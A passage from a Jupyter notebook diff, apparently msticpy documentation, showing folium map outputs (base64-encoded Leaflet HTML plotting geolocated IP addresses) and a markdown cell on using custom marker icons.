vdGF0ZS0wIiwgImljb24iOiAiZmxhc2giLCAiaWNvbkNvbG9yIjogIndoaXRlIiwgIm1hcmtlckNvbG9yIjogInJlZCIsICJwcmVmaXgiOiAiZ2x5cGhpY29uIn0KICAgICAgICAgICAgKTsKICAgICAgICAgICAgbWFya2VyXzQ2MjAzMDU3YThhZDRkZDdiN2M1YjE5YTQ1OTg5MmQ5LnNldEljb24oaWNvbl81YzdmMWI2MWRkYTk0ODU4OGYzMGMwZTZmZWM4ZGZkZSk7CiAgICAgICAgCiAgICAKICAgICAgICB2YXIgcG9wdXBfYjg0YThiZmY0NjNmNGQ0MjkzOWQ3Y2YzNzk4Y2NmYTEgPSBMLnBvcHVwKHsibWF4V2lkdGgiOiAiMTAwJSJ9KTsKCiAgICAgICAgCiAgICAgICAgICAgIHZhciBodG1sXzQ4Mjk3MDViNWNmODQzZDE4ZDI5Yjc5ZTc0NzhmY2EzID0gJChgPGRpdiBpZD0iaHRtbF80ODI5NzA1YjVjZjg0M2QxOGQyOWI3OWU3NDc4ZmNhMyIgc3R5bGU9IndpZHRoOiAxMDAuMCU7IGhlaWdodDogMTAwLjAlOyI+Q291bnRyeUNvZGU9VVMsIENvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMsIFN0YXRlPUlvd2EsIENpdHk9RGVzIE1vaW5lcywgTG9uZ2l0dWRlPS05My42MTEyLCBMYXRpdHVkZT00MS42MDA2LCBUeXBlPWdlb2xvY2F0aW9uPGJyPklQOiAxMy44OS4yMjAuNjU8L2Rpdj5gKVswXTsKICAgICAgICAgICAgcG9wdXBfYjg0YThiZmY0NjNmNGQ0MjkzOWQ3Y2YzNzk4Y2NmYTEuc2V0Q29udGVudChodG1sXzQ4Mjk3MDViNWNmODQzZDE4ZDI5Yjc5ZTc0NzhmY2EzKTsKICAgICAgICAKCiAgICAgICAgbWFya2VyXzQ2MjAzMDU3YThhZDRkZDdiN2M1YjE5YTQ1OTg5MmQ5LmJpbmRQb3B1cChwb3B1cF9iODRhOGJmZjQ2M2Y0ZDQyOTM5ZDdjZjM3OThjY2ZhMSkKICAgICAgICA7CgogICAgICAgIAogICAgCiAgICAKICAgICAgICAgICAgbWFya2VyXzQ2MjAzMDU3YThhZDRkZDdiN2M1YjE5YTQ1OTg5MmQ5LmJpbmRUb29sdGlwKAogICAgICAgICAgICAgICAgYDxkaXY+CiAgICAgICAgICAgICAgICAgICAgIERlcyBNb2luZXMsIFVuaXRlZCBTdGF0ZXMKICAgICAgICAgICAgICAgICA8L2Rpdj5gLAogICAgICAgICAgICAgICAgeyJzdGlja3kiOiB0cnVlfQogICAgICAgICAgICApOwogICAgICAgIAogICAgCiAgICAgICAgICAgIHZhciBtYXJrZXJfYzEyYjYyYzJhYTExNDg1OGE1ZjQzNzk1NDk4YTIyZGYgPSBMLm1hcmtlcigKICAgICAgICAgICAgICAgIFs0MS42MDA2LCAtOTMuNjExMl0sCiAgICAgICAgICAgICAgICB7fQogICAgICAgICAgICApLmFkZFRvKG1hcF8yM2M2YmZhMGVjZmQ0NjcyOWJkYTQ5MTdlNmYxYzgxYyk7CiAgICAgICAgCiAgICAKICAgICAgICAgICAgdmFyIGljb25fYmYxMGVkODhlZWY4NGY4ZWJlNzdhYmJlYWEwMDZlMTUgPSBMLkF3ZXNvbWVNYXJrZXJzLmljb24oCiAgICAgICAgICAgICAgICB7ImV4dHJhQ2xhc3NlcyI6ICJmYS1yb3RhdGUtMCIsICJpY29uIjogImZsYXNoIiwgImljb25Db2xvciI6ICJ3aGl0ZSIsICJtYXJrZXJDb2xvciI6ICJyZWQiLCAicHJlZml4IjogImdseXBoaWNvbiJ9CiAgICAgICAgICAgICk7CiAgICAgICAgICAgIG1hcmtlcl9jMTJiNjJjMmFhMTE0ODU4YTVmNDM3OTU0OThhMjJkZi5zZXRJY29uKGljb25fYmYxMGVkODhlZWY4NGY4ZWJlNzdhYmJlYWEwMDZlMTUpOwogICAgICAgIAogICAgCiAgICAgICAgdmFyIHBvcHVwX2FiZWUzZGI2MWFjMjRkMDdhYzVhYWY4NmMzYWQ5MWU4ID0gTC5wb3B1cCh7Im1heFdpZHRoIjogIjEwMCUifSk7CgogICAgICAgIAogICAgICAgICAgICB2YXIgaHRtbF9hYzU3NmQyYjgzNjg0MzUwYTU1YWI4Y2FiYzg3Yzk5MSA9ICQoYDxkaXYgaWQ9Imh0bWxfYWM1NzZkMmI4MzY4NDM1MGE1NWFiOGNhYmM4N2M5OTEiIHN0eWxlPSJ3aWR0aDogMTAwLjAlOyBoZWlnaHQ6IDEwMC4wJTsiPkNvdW50cnlDb2RlPVVTLCBDb3VudHJ5TmFtZT1Vbml0ZWQgU3RhdGVzLCBTdGF0ZT1Jb3dhLCBDaXR5PURlcyBNb2luZXMsIExvbmdpdHVkZT0tOTMuNjExMiwgTGF0aXR1ZGU9NDEuNjAwNiwgVHlwZT1nZW9sb2NhdGlvbjxicj5JUDogNTIuMTY1LjE3NS4xNDQ8L2Rpdj5gKVswXTsKICAgICAgICAgICAgcG9wdXBfYWJlZTNkYjYxYWMyNGQwN2FjNWFhZjg2YzNhZDkxZTguc2V0Q29udGVudChodG1sX2FjNTc2ZDJiODM2ODQzNTBhNTVhYjhjYWJjODdjOTkxKTsKICAgICAgICAKCiAgICAgICAgbWFya2VyX2MxMmI2MmMyYWExMTQ4NThhNWY0Mzc5NTQ5OGEyMmRmLmJpbmRQb3B1cChwb3B1cF9hYmVlM2RiNjFhYzI0ZDA3YWM1YWFmODZjM2FkOTFlOCkKICAgICAgICA7CgogICAgICAgIAogICAgCiAgICAKICAgICAgICAgICAgbWFya2VyX2MxMmI2MmMyYWExMTQ4NThhNWY0Mzc5NTQ5OGEyMmRmLmJpbmRUb29sdGlwKAogICAgICAgICAgICAgICAgYDxkaXY+CiAgICAgICAgICAgICAgICAgICAgIERlcyBNb2luZXMsIFVuaXRlZCBTdGF0ZXMKICAgICAgICAgICAgICAgICA8L2Rpdj5gLAogICAgICAgICAgICAgICAgeyJzdGlja3kiOiB0cnVlfQogICAgICAgICAgICApOwogICAgICAgIAogICAgCiAgICAgICAgICAgIHZhciBtYXJrZXJfNGE0YmYyZDg4OTE2NDc4NGE4MmEwYWExNmJiZjZmNmEgPSBMLm1hcmtlcigKICAgICAgICAgICAgICAgIFs0MS42MDA2LCAtOTMuNjExMl0sCiAgICAgICAgICAgICAgICB7fQogICAgICAgICAgICApLmFkZFRvKG1hcF8yM2M2YmZhMGVjZmQ0NjcyOWJkYTQ5MTdlNmYxYzgxYyk7CiAgICAgICAgCiAgICAKICAgICAgICAgICAgdmFyIGljb25fNDc2ZDdkMjRiYWVlNGIyMjhiZTJlZjVhYmNlNmUyMDggPSBMLkF3ZXNvbWVNYXJrZXJzLmljb24oCiAgICAgICAgICAgICAgICB7ImV4dHJhQ2xhc3NlcyI6ICJmYS1yb3RhdGUtMCIsICJpY29uIjogImZsYXNoIiwgImljb25Db2xvciI6ICJ3aGl0ZSIsICJtYXJrZXJDb2xvciI6ICJyZWQiLCAicHJlZml4IjogImdseXBoaWNvbiJ9CiAgICAgICAgICAgICk7CiAgICAgICAgICAgIG1hcmtlcl80YTRiZjJkODg5MTY0Nzg0YTgyYTBhYTE2YmJmNmY2YS5zZXRJY29uKGljb25fNDc2ZDdkMjRiYWVlNGIyMjhiZTJlZjVhYmNlNmUyMDgpOwogICAgICAgIAogICAgCiAgICAgICAgdmFyIHBvcHVwXzcwMTBjZmNiZWY3YzRiMWE4OTdmN2E1ZjY4ZjVmM2FjID0gTC5wb3B1cCh7Im1heFdpZHRoIjogIjEwMCUifSk7CgogICAgICAgIAogICAgICAgICAgICB2YXIgaHRtbF85NTZiOGEwYjE1OWI0MjM2OTVmNTZkNDM2MmM0ZGEwYyA9ICQoYDxkaXYgaWQ9Imh0bWxfOTU2YjhhMGIxNTliNDIzNjk1ZjU2ZDQzNjJjNGRhMGMiIHN0eWxlPSJ3aWR0aDogMTAwLjAlOyBoZWlnaHQ6IDEwMC4wJTsiPkNvdW50cnlDb2RlPVVTLCBDb3VudHJ5TmFtZT1Vbml0ZWQgU3RhdGVzLCBTdGF0ZT1Jb3dhLCBDaXR5PURlcyBNb2luZXMsIExvbmdpdHVkZT0tOTMuNjExMiwgTGF0aXR1ZGU9NDEuNjAwNiwgVHlwZT1nZW9sb2NhdGlvbjxicj5JUDogNTIuMTczLjI2LjE4MTwvZGl2PmApWzBdOwogICAgICAgICAgICBwb3B1cF83MDEwY2ZjYmVmN2M0YjFhODk3ZjdhNWY2OGY1ZjNhYy5zZXRDb250ZW50KGh0bWxfOTU2YjhhMGIxNTliNDIzNjk1ZjU2ZDQzNjJjNGRhMGMpOwogICAgICAgIAoKICAgICAgICBtYXJrZXJfNGE0YmYyZDg4OTE2NDc4NGE4MmEwYWExNmJiZjZmNmEuYmluZFBvcHVwKHBvcHVwXzcwMTBjZmNiZWY3YzRiMWE4OTdmN2E1ZjY4ZjVmM2FjKQogICAgICAgIDsKCiAgICAgICAgCiAgICAKICAgIAogICAgICAgICAgICBtYXJrZXJfNGE0YmYyZDg4OTE2NDc4NGE4MmEwYWExNmJiZjZmNmEuYmluZFRvb2x0aXAoCiAgICAgICAgICAgICAgICBgPGRpdj4KICAgICAgICAgICAgICAgICAgICAgRGVzIE1vaW5lcywgVW5pdGVkIFN0YXRlcwogICAgICAgICAgICAgICAgIDwvZGl2PmAsCiAgICAgICAgICAgICAgICB7InN0aWNreSI6IHRydWV9CiAgICAgICAgICAgICk7CiAgICAgICAgCjwvc2NyaXB0Pg== onload=\"this.contentDocument.open();this.contentDocument.write(atob(this.getAttribute('data-html')));this.contentDocument.close();\" allowfullscreen webkitallowfullscreen mozallowfullscreen></iframe></div></div>"
+      ],
+      "text/plain": [
+       "<msticpy.nbtools.foliummap.FoliumMap at 0x297d5fe2a88>"
+      ]
+     },
+     "execution_count": 17,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "fmap_ips.add_ip_cluster(ip_entities=ip_ents[30:40], color='red', icon=\"flash\")\n",
+    "fmap_ips.center_map()\n",
+    "fmap_ips"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Custom Icons\n",
+    "\n",
+    "By default folium uses the information icon (i).\n",
+    "Icons can be taken from the default Bootstrap set. See the default list here [glyphicons](https://www.w3schools.com/icons/bootstrap_icons_glyphicons.asp)\n",
+    "\n",
+    "Alternatively you can use icons from the [Font Awesome collection](https://fontawesome.com/icons?d=gallery)\n",
+    "by adding prefx=\"fa\" and icon=\"icon_name\" to the call to add_ip_cluster or add_geo_cluster."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 18,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-08T01:01:41.806012Z",
+     "start_time": "2020-02-08T01:01:41.678087Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div style=\"width:100%;\"><div style=\"position:relative;width:100%;height:0;padding-bottom:60%;\"><span style=\"color:#565656\">Make this Notebook Trusted to load map: File -> Trust Notebook</span><iframe src=\"about:blank\" style=\"position:absolute;width:100%;height:100%;left:0;top:0;border:none !important;\" data-html=PCFET0NUWVBFIGh0bWw+CjxoZWFkPiAgICAKICAgIDxtZXRhIGh0dHAtZXF1aXY9ImNvbnRlbnQtdHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PVVURi04IiAvPgogICAgCiAgICAgICAgPHNjcmlwdD4KICAgICAgICAgICAgTF9OT19UT1VDSCA9IGZhbHNlOwogICAgICAgICAgICBMX0RJU0FCTEVfM0QgPSBmYWxzZTsKICAgICAgICA8L3NjcmlwdD4KICAgIAogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuLmpzZGVsaXZyLm5ldC9ucG0vbGVhZmxldEAxLjYuMC9kaXN0L2xlYWZsZXQuanMiPjwvc2NyaXB0PgogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY29kZS5qcXVlcnkuY29tL2pxdWVyeS0xLjEyLjQubWluLmpzIj48L3NjcmlwdD4KICAgIDxzY3JpcHQgc3JjPSJodHRwczovL21heGNkbi5ib290c3RyYXBjZG4uY29tL2Jvb3RzdHJhcC8zLjIuMC9qcy9ib290c3RyYXAubWluLmpzIj48L3NjcmlwdD4KICAgIDxzY3JpcHQgc3JjPSJodHRwczovL2NkbmpzLmNsb3VkZmxhcmUuY29tL2FqYXgvbGlicy9MZWFmbGV0LmF3ZXNvbWUtbWFya2Vycy8yLjAuMi9sZWFmbGV0LmF3ZXNvbWUtbWFya2Vycy5qcyI+PC9zY3JpcHQ+CiAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9Imh0dHBzOi8vY2RuLmpzZGVsaXZyLm5ldC9ucG0vbGVhZmxldEAxLjYuMC9kaXN0L2xlYWZsZXQuY3NzIi8+CiAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9Imh0dHBzOi8vbWF4Y2RuLmJvb3RzdHJhcGNkbi5jb20vYm9vdHN0cmFwLzMuMi4wL2Nzcy9ib290c3RyYXAubWluLmNzcyIvPgogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJodHRwczovL21heGNkbi5ib290c3RyYXBjZG4uY29tL2Jvb3RzdHJhcC8zLjIuMC9jc3MvYm9vdHN0cmFwLXRoZW1lLm1pbi5jc3MiLz4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0iaHR0cHM6Ly9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9mb250LWF3ZXNvbWUvNC42LjMvY3NzL2ZvbnQtYXdlc29tZS5taW4uY3NzIi8+CiAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL0xlYWZsZXQuYXdlc29tZS1tYXJrZXJzLzIuMC4yL2xlYWZsZXQuYXdlc29tZS1tYXJrZXJzLmNzcyIvPgogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJodHRwczovL3Jhd2Nkbi5naXRoYWNrLmNvbS9weXRob24tdmlzdWFsaXphdGlvbi9mb2xpdW0vbWFzdGVyL2ZvbGl1bS90ZW1wbGF0ZXMvbGVhZmxldC5hd2Vzb21lLnJvdGF0ZS5jc3MiLz4KICAgIDxzdHlsZT5odG1sLCBib2R5IHt3aWR0aDogMTAwJTtoZWlnaHQ6IDEwMCU7bWFyZ2luOiAwO3BhZGRpbmc6IDA7fTwvc3R5bGU+CiAgICA8c3R5bGU+I21hcCB7cG9zaXRpb246YWJzb2x1dGU7dG9wOjA7Ym90dG9tOjA7cmlnaHQ6MDtsZWZ0OjA7fTwvc3R5bGU+CiAgICAKICAgICAgICAgICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwKICAgICAgICAgICAgICAgIGluaXRpYWwtc2NhbGU9MS4wLCBtYXhpbXVtLXNjYWxlPTEuMCwgdXNlci1zY2FsYWJsZT1ubyIgLz4KICAgICAgICAgICAgPHN0eWxlPgogICAgICAgICAgICAgICAgI21hcF8yM2M2YmZhMGVjZmQ0NjcyOWJkYTQ5MTdlNmYxYzgxYyB7CiAgICAgICAgICAgICAgICAgICAgcG9zaXRpb246IHJlbGF0aXZlOwogICAgICAgICAgICAgICAgICAgIHdpZHRoOiAxMDAuMCU7CiAgICAgICAgICAgICAgICAgICAgaGVpZ2h0OiAxMDAuMCU7CiAgICAgICAgICAgICAgICAgICAgbGVmdDogMC4wJTsKICAgICAgICAgICAgICAgICAgICB0b3A6IDAuMCU7CiAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgIDwvc3R5bGU+CiAgICAgICAgCjwvaGVhZD4KPGJvZHk+ICAgIAogICAgCiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImZvbGl1bS1tYXAiIGlkPSJtYXBfMjNjNmJmYTBlY2ZkNDY3MjliZGE0OTE3ZTZmMWM4MWMiID48L2Rpdj4KICAgICAgICAKPC9ib2R5Pgo8c2NyaXB0PiAgICAKICAgIAogICAgICAgICAgICB2YXIgbWFwXzIzYzZiZmEwZWNmZDQ2NzI5YmRhNDkxN2U2ZjFjODFjID0gTC5tYXAoCiAgICAgICAgICAgICAgICAibWFwXzIzYzZiZmEwZWNmZDQ2NzI5YmRhNDkxN2U2ZjFjODFjIiwKICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICBjZW50ZXI6IFszOC43MDk1LCAtNzkuNDE5NV0sCiAgICAgICAgICAgICAgICAgICAgY3JzOiBMLkNSUy5FUFNHMzg1NywKICAgICAgICAgICAgICAgICAgICB6b29tOiAyLjUsCiAgICAgICAgICAgICAgICAgICAgem9vbUNvbnRyb2w6IHRydWUsCiAgICAgICAgICAgICAgICAgICAgcHJlZmVyQ2FudmFzOiBmYWxzZSwKICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgKTsKCiAgICAgICAgICAgIAoKICAgICAgICAKICAgIAogICAgICAgICAgICB2YXIgdGlsZV9sYXllcl9iNmQxNTZjNmMwZGU0NDY1OWI4ZTI5NjhmYWM5NDU0MCA9IEwudGlsZUxheWVyKAogICAgICAgICAgICAgICAgImh0dHBzOi8ve3N9LnRpbGUub3BlbnN0cmVldG1hcC5vcmcve3p9L3t4fS97eX0ucG5nIiwKICAgICAgICAgICAgICAgIHsiYXR0cmlidXRpb24iOiAiRGF0YSBieSBcdTAwMjZjb3B5OyBcdTAwM2NhIGhyZWY9XCJodHRwOi8vb3BlbnN0cmVldG1hcC5vcmdcIlx1MDAzZU9wZW5TdHJlZXRNYXBcdTAwM2MvYVx1MDAzZSwgdW5kZXIgXHUwMDNjYSBocmVmPVwiaHR0cDovL3d3dy5vcGVuc3RyZWV0bWFwLm9yZy9jb3B5cmlnaHRcIlx1MDAzZU9EYkxcdTAwM2MvYVx1MDAzZS4iLCAiZGV0ZWN0UmV0aW5hIjogZmFsc2UsICJtYXhOYXRpdmVab29tIjogMTgsICJtYXhab29tIjogMTgsICJtaW5ab29tIjogMCwgIm5vV3JhcCI6IGZhbHNlLCAib3BhY2l0eSI6IDEsICJzdWJkb21haW5zIjogImFiYyIsICJ0bXMiOiBmYWxzZX0KICAgICAgICAgICAgKS5hZGRUbyhtYXBfMjNjNmJmYTBlY2ZkNDY3MjliZGE0OTE3ZTZmMWM4MWMpOwogICAgICAgIAogICAgCiAgICAgICAgICAgIHZhciBtYXJrZXJfNDhhNTZkYzJkYjk3NDQ5OWEwZjRlMzk5MzQzOTczNjcgPSBMLm1hcmtlcigKICAgICAgICAgICAgICAgIFszNi42NTM0LCAtNzguMzc1XSwKICAgICAgICAgICAgICAgIHt9CiAgICAgICAgICAgICkuYWRkVG8obWFwXzIzYzZiZmEwZWNmZDQ2NzI5YmRhNDkxN2U2ZjFjODFjKTsKICAgICAgICAKICAgIAogICAgICAgICAgICB2YXIgaWNvbl8wMTMwOWVlZGRlOTI0NTVmOWMxZGJhNTU3ZmFhOTczOCA9IEwuQXdlc29tZU1hcmtlcnMuaWNvbigKICAgICAgICAgICAgICAgIHsiZXh0cmFDbGFzc2VzIjogImZhLXJvdGF0ZS0wIiwgImljb24iOiAiaW5mby1zaWduIiwgImljb25Db2xvciI6ICJ3aGl0ZSIsICJtYXJrZXJDb2xvciI6ICJibHVlIiwgInByZWZpeCI6ICJnbHlwaGljb24ifQogICAgICAgICAgICApOwogICAgICAgICAgICBtYXJrZXJfNDhhNTZkYzJkYjk3NDQ5OWEwZjRlMzk5MzQzOTczNjcuc2V0SWNvbihpY29uXzAxMzA5ZWVkZGU5MjQ1NWY5YzFkYmE1NTdmYWE5NzM4KTsKICAgICAgICAKICAgIAogICAgICAgIHZhciBwb3B1cF85NDBkNDg4Yjk3MzM0Y2RiYTI3YzMzOWVhMzkwOTYzYyA9IEwucG9wdXAoeyJtYXhXaWR0aCI6ICIxMDAlIn0pOwoKICAgICAgICAKICAgICAgICAgICAgdmFyIGh0bWxfYzM2NWZhODA0NDM2NDI0MWIyYjhhYjYzYTE5NGM5ODEgPSAkKGA8ZGl2IGlkPSJodG1sX2MzNjVmYTgwNDQzNjQyNDFiMmI4YWI2M2ExOTRjOTgxIiBzdHlsZT0id2lkdGg6IDEwMC4wJTsgaGVpZ2h0OiAxMDAuMCU7Ij5Db3VudHJ5Q29kZT1VUywgQ291bnRyeU5hbWU9VW5pdGVkIFN0YXRlcywgU3RhdGU9VmlyZ2luaWEsIENpdHk9Qm95ZHRvbiwgTG9uZ2l0dWRlPS03OC4zNzUsIExhdGl0dWRlPTM2LjY1MzQsIFR5cGU9Z2VvbG9jYXRpb248YnI+SVA6IDY1LjU1LjQ0LjEwOTwvZGl2PmApWzBdOwogICAgICAgICAgICBwb3B1cF85NDBkNDg4Yjk3MzM0Y2RiYTI3YzMzOWVhMzkwOTYzYy5zZXRDb250ZW50KGh0bWxfYzM2NWZhODA0NDM2NDI0MWIyYjhhYjYzYTE5NGM5ODEpOwogICAgICAgIAoKICAgICAgICBtYXJrZXJfNDhhNTZkYzJkYjk3NDQ5OWEwZjRlMzk5MzQzOTczNjcuYmluZFBvcHVwKHBvcHVwXzk0MGQ0ODhiOTczMzRjZGJhMjdjMzM5ZWEzOTA5NjNjKQogICAgICAgIDsKCiAgICAgICAgCiAgICAKICAgIAogICAgICAgICAgICBtYXJrZXJfNDhhNTZkYzJkYjk3NDQ5OWEwZjRlMzk5MzQzOTczNjcuYmluZFRvb2x0aXAoCiAgICAgICAgICAgICAgICBgPGRpdj4KICAgICAgICAgICAgICAgICAgICAgQm95ZHRvbiwgVW5pdGVkIFN0YXRlcwogICAgICAgICAgICAgICAgIDwvZGl2PmAsCiAgICAgICAgICAgICAgICB7InN0aWNreSI6IHRydWV9CiAgICAgICAgICAgICk7CiAgICAgICAgCiAgICAKICAgICAgICAgICAgdmFyIG1hcmtlcl8wNzljNGM3YzdlZjY0NTFhOGUwNmUzNWQ4MzRjZWYzZiA9IEwubWFya2VyKAogICAgICAgICAgICAgICAgWzQzLjY2NDQsIC03OS40MTk1XSwKICAgICAgICAgICAgICAgIHt9CiAgICAgICAgICAgICkuYWRkVG8obWFwXzIzYzZiZmEwZWNmZDQ2NzI5YmRhNDkxN2U2ZjFjODFjKTsKICAgICAgICAKICAgIAogICAgICAgICAgICB2YXIgaWNvbl8wMTIyMGQ0ZGNhZjg0OWQ5OTYyNTAwZDQ0NjA5ZjE0ZiA9IEwuQXdlc29tZU1hcmtlcnMuaWNvbigKICAgICAgICAgICAgICAgIHsiZXh0cmFDbGFzc2VzIjogImZhLXJvdGF0ZS0wIiwgImljb24iOiAiaW5mby1zaWduIiwgImljb25Db2xvciI6ICJ3aGl0ZSIsICJtYXJrZXJDb2xvciI6ICJibHVlIiwgInByZWZpeCI6ICJnbHlwaGljb24ifQogICAgICAgICAgICApOwogICAgICAgICAgICBtYXJrZXJfMDc5YzRjN2M3ZWY2NDUxYThlMDZlMzVkODM0Y2VmM2Yuc2V0SWNvbihpY29uXzAxMjIwZDRkY2FmODQ5ZDk5NjI1MDBkNDQ2MDlmMTRmKTsKICAgICAgICAKICAgIAogICAgICAgIHZhciBwb3B1cF83NGQzODdhZDc4ZTk0MDgyYmU5MTgyMDk2YjlmNTgxOSA9IEwucG9wdXAoeyJtYXhXaWR0aCI6ICIxMDAlIn0pOwoKICAgICAgICAKICAgICAgICAgICAgdmFyIGh0bWxfMmI2ZDMwODNmZjc3NDdkZGI5ZTEyMWQ2Nzk1NDYyOTQgPSAkKGA8ZGl2IGlkPSJodG1sXzJiNmQzMDgzZmY3NzQ3ZGRiOWUxMjFkNjc5NTQ2Mjk0IiBzdHlsZT0id2lkdGg6IDEwMC4wJTsgaGVpZ2h0OiAxMDAuMCU7Ij5Db3VudHJ5Q29kZT1DQSwgQ291bnRyeU5hbWU9Q2FuYWRhLCBTdGF0ZT1PbnRhcmlvLCBDaXR5PVRvcm9udG8sIExvbmdpdHVkZT0tNzkuNDE5NSwgTGF0aXR1ZGU9NDMuNjY0NCwgVHlwZT1nZW9sb2NhdGlvbjxicj5JUDogMTMuNzEuMTcyLjEyODwvZGl2PmApWzBdOwogICAgICAgICAgICBwb3B1cF83NGQzODdhZDc4ZTk0MDgyYmU5MTgyMDk2YjlmNTgxOS5zZXRDb250ZW50KGh0bWxfMmI2ZDMwODNmZjc3NDdkZGI5ZTEyMWQ2Nzk1NDYyOTQpOwogICAgICAgIAoKICAgICAgICBtYXJrZXJfMDc5YzRjN2M3ZWY2NDUxYThlMDZlMzVkODM0Y2VmM2YuYmluZFBvcHVwKHBvcHVwXzc0ZDM4N2FkNzhlOTQwODJiZTkxODIwOTZiOWY1ODE5KQogICAgICAgIDsKCiAgICAgICAgCiAgICAKICAgIAogICAgICAgICAgICBtYXJrZXJfMDc5YzRjN2M3ZWY2NDUxYThlMDZlMzVkODM0Y2VmM2YuYmluZFRvb2x0aXAoCiAgICAgICAgICAgICAgICBgPGRpdj4KICAgICAgICAgICAgICAgICAgICAgVG9yb250bywgQ2FuYWRhCiAgICAgICAgICAgICAgICAgPC9kaXY+YCwKICAgICAgICAgICAgICAgIHsic3RpY2t5IjogdHJ1ZX0KICAgICAgICAgICAgKTsKICAgICAgICAKICAgIAogICAgICAgICAgICB2YXIgbWFya2VyX2M1OWY0ZmU1MzAzMzQ2N2FhNGU1MjhjMDVlZWQ4ODBlID0gTC5tYXJrZXIoCiAgICAgICAgICAgICAgICBbNDMuNjY0NCwgLTc5LjQxOTVdLAogICAgICAgICAgICAgICAge30KICAgICAgICAgICAgKS5hZGRUbyhtYXBfMjNjNmJmYTBlY2ZkNDY3MjliZGE0OTE3ZTZmMWM4MWMpOwogICAgICAgIAogICAgCiAgICAgICAgICAgIHZhciBpY29uXzQ1OGQxZDQ2ZGMxNTQ3MWViN2U0NDllNDliMzFmMDUxID0gTC5Bd2Vzb21lTWFya2Vycy5pY29uKAogICAgICAgICAgICAgICAgeyJleHRyYUNsYXNzZXMiOiAiZmEtcm90YXRlLTAiLCAiaWNvbiI6ICJpbmZvLXNpZ24iLCAiaWNvbkNvbG9yIjogIndoaXRlIiwgIm1hcmtlckNvbG9yIjogImJsdWUiLCAicHJlZml4IjogImdseXBoaWNvbiJ9CiAgICAgICAgICAgICk7CiAgICAgICAgICAgIG1hcmtlcl9jNTlmNGZlNTMwMzM0NjdhYTRlNTI4YzA1ZWVkODgwZS5zZXRJY29uKGljb25fNDU4ZDFkNDZkYzE1NDcxZWI3ZTQ0OWU0OWIzMWYwNTEpOwogICAgICAgIAogICAgCiAgICAgICAgdmFyIHBvcHVwXzkwYTU0NmRkZTdiYjQ1NDZhMzc0NDk0MGFmNjhhNWFhID0gTC5wb3B1cCh7Im1heFdpZHRoIjogIjEwMCUifSk7CgogICAgICAgIAogICAgICAgICAgICB2YXIgaHRtbF9iMjZmZDNkODk1OTI0Zjg1ODM2MDJhZTQyMWZhNmVlOSA9ICQoYDxkaXYgaWQ9Imh0bWxfYjI2ZmQzZDg5NTkyNGY4NTgzNjAyYWU0MjFmYTZlZTkiIHN0eWxlPSJ3aWR0aDogMTAwLjAlOyBoZWlnaHQ6IDEwMC4wJTsiPkNvdW50cnlDb2RlPUNBLCBDb3VudHJ5TmFtZT1DYW5hZGEsIFN0YXRlPU9udGFyaW8sIENpdHk9VG9yb250bywgTG9uZ2l0dWRlPS03OS40MTk1LCBMYXRpdHVkZT00My42NjQ0LCBUeXBlPWdlb2xvY2F0aW9uPGJyPklQOiAxMy43MS4xNzIuMTMwPC9kaXY+YClbMF07CiAgICAgICAgICAgIHBvcHVwXzkwYTU0NmRkZTdiYjQ1NDZhMzc0NDk0MGFmNjhhNWFhLnNldENvbnRlbnQoaHRtbF9iMjZmZDNkODk1OTI0Zjg1ODM2MDJhZTQyMWZhNmVlOSk7CiAgICAgICAgCgogICAgICAgIG1hcmtlcl9jNTlmNGZlNTMwMzM0NjdhYTRlNTI4YzA1ZWVkODgwZS5iaW5kUG9wdXAocG9wdXBfOTBhNTQ2ZGRlN2JiNDU0NmEzNzQ0OTQwYWY2OGE1YWEpCiAgICAgICAgOwoKICAgICAgICAKICAgIAogICAgCiAgICAgICAgICAgIG1hcmtlcl9jNTlmNGZlNTMwMzM0NjdhYTRlNTI4YzA1ZWVkODgwZS5iaW5kVG9vbHRpcCgKICAgICAgICAgICAgICAgIGA8ZGl2PgogICAgICAgICAgICAgICAgICAgICBUb3JvbnRvLCBDYW5hZGEKICAgICAgICAgICAgICAgICA8L2Rpdj5gLAogICAgICAgICAgICAgICAgeyJzdGlja3kiOiB0cnVlfQogICAgICAgICAgICApOwogICAgICAgIAogICAgCiAgICAgICAgICAgIHZhciBtYXJrZXJfY2NhOTNmOTE3ZDI3NDRhNGFhOTgzNWYwNDJmOTFjZTggPSBMLm1hcmtlcigKICAgICAgICAgICAgICAgIFsyOS40MjQ3LCAtOTguNDkzNV0sCiAgICAgICAgICAgICAgICB7fQogICAgICAgICAgICApLmFkZFRvKG1hcF8yM2M2YmZhMGVjZmQ0NjcyOWJkYTQ5MTdlNmYxYzgxYyk7CiAgICAgICAgCiAgICAKICAgICAgICAgICAgdmFyIGljb25fOGY3MzFhYzMxZmM0NDMyNThiZDg0OGMxMWYwNzY5NmIgPSBMLkF3ZXNvbWVNYXJrZXJzLmljb24oCiAgICAgICAgICAgICAgICB7ImV4dHJhQ2xhc3NlcyI6ICJmYS1yb3RhdGUtMCIsICJpY29uIjogImluZm8tc2lnbiIsICJpY29uQ29sb3IiOiAid2hpdGUiLCAibWFya2VyQ29sb3IiOiAiYmx1ZSIsICJwcmVm